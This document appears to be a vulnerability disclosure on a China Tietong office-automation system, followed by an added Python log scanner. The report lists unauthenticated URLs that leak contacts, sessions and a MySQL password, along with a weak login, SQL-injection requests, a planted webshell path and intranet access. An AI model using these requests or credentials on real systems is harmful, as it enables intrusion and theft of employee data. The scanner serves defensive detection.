Sensitive employee contact information leak in a China Tietong system / getshell without login
Sensitive employee contact information leak in a China Tietong system + session leakage + weak password + MySQL password leakage + multiple SQL injection points + absolute path leakage + getshell without login + intranet server login #2
#1 Leakage of sensitive employee contact information
http://**.**:6789/yyoa/assess/js/initDataAssess.jsp
http://***.**:6789/yyoa/common/selectPersonNew/initData.jsp?TrueName=1
#2 Session leakage
http://***.**:6789/yyoa/ext/https/getSessionList.jsp?Cmd=getAll
#3 MySQL password leakage
http://**.**:6789/yyoa/createMysql.jsp
#3 weak passwords
Hchun 1, 123456
#4 View the database name
http://***.**:6789/yyoa/common/js/menu/test.jsp?DoType=101&S1=select%20database()
#5 Multiple SQL injection points
http://***.**:6789/yyoa/common/selectPersonNew/initData.jsp?TrueName=1
http://***.**:6789/yyoa/checkWaitdo.jsp?UserID=1
http://***.**:6789/yyoa/common/js/menu/test.jsp?DoType=101&S1=*
Manual proof of DBA permissions:
http://***.**:6789/yyoa/common/js/menu/test.jsp?DoType=101&S1=select%20user()
#6 Absolute path leakage
http://***.**:6789/yyoa/common/js/menu/test.jsp?DoType=101&S1=select%20@basedir
#7 Getshell without login
http://**.**:6789/yyoa/zhengkai.jsp
Kai
#8 Log on to an intranet server
Too slow
Just a quick screenshot
Solution:
Fix.
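
A defender-side check for the endpoints listed above, as an added example that is not part of the original report: it scans web access logs for requests to the unauthenticated yyoa paths and flags SQL text in their parameters. The combined log format, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Paths listed in the report, lower-cased; all answered without a login.
WATCHED = {
    "/yyoa/assess/js/initdataassess.jsp": "contact data leak",
    "/yyoa/common/selectpersonnew/initdata.jsp": "contact data leak / SQL injection",
    "/yyoa/ext/https/getsessionlist.jsp": "session leak",
    "/yyoa/createmysql.jsp": "MySQL password leak",
    "/yyoa/checkwaitdo.jsp": "SQL injection",
    "/yyoa/common/js/menu/test.jsp": "SQL run from the S1 parameter",
}
SQL_HINT = re.compile(r"\b(select|union|sleep|benchmark)\b|@@|--|/\*", re.I)
# Assumed combined log format: ip ident user [time] "METHOD target PROTO" status ...
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3})')

def classify(line):
    """Return a finding dict for a request to a watched path, else None."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    ip, target, status = m.group(1), m.group(2), int(m.group(3))
    parts = urlsplit(target)
    # Normalise the path: decode %xx, drop ";param" suffixes, collapse "//".
    path = re.sub(r"/+", "/", unquote(parts.path).split(";")[0]).lower()
    if path not in WATCHED:
        return None
    # parse_qs URL-decodes values, so "select%20user()" is matched as text.
    values = [v for vs in parse_qs(parts.query, keep_blank_values=True).values() for v in vs]
    sql = any(SQL_HINT.search(v) for v in values)
    # A 200 means the endpoint is still exposed; SQL text means active probing.
    severity = "high" if status == 200 or sql else "low"
    return {"ip": ip, "path": path, "issue": WATCHED[path],
            "status": status, "sql_in_params": sql, "severity": severity}

def scan(lines):
    return [f for f in map(classify, lines) if f]

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE = [
    '198.51.100.7 - - [01/Jan/2024:10:00:00 +0800] "GET /yyoa/common/js/menu/test.jsp?DoType=101&S1=select%20database() HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0800] "GET /yyoa/ext/https/getSessionList.jsp?Cmd=getAll HTTP/1.1" 200 2048',
    '192.0.2.10 - - [01/Jan/2024:10:01:00 +0800] "GET /yyoa/index.jsp HTTP/1.1" 200 1024',
    '192.0.2.11 - - [01/Jan/2024:10:02:00 +0800] "GET /yyoa//createMysql.jsp HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

Any "high" finding with status 200 indicates the path still responds without authentication and should be blocked or removed at the server.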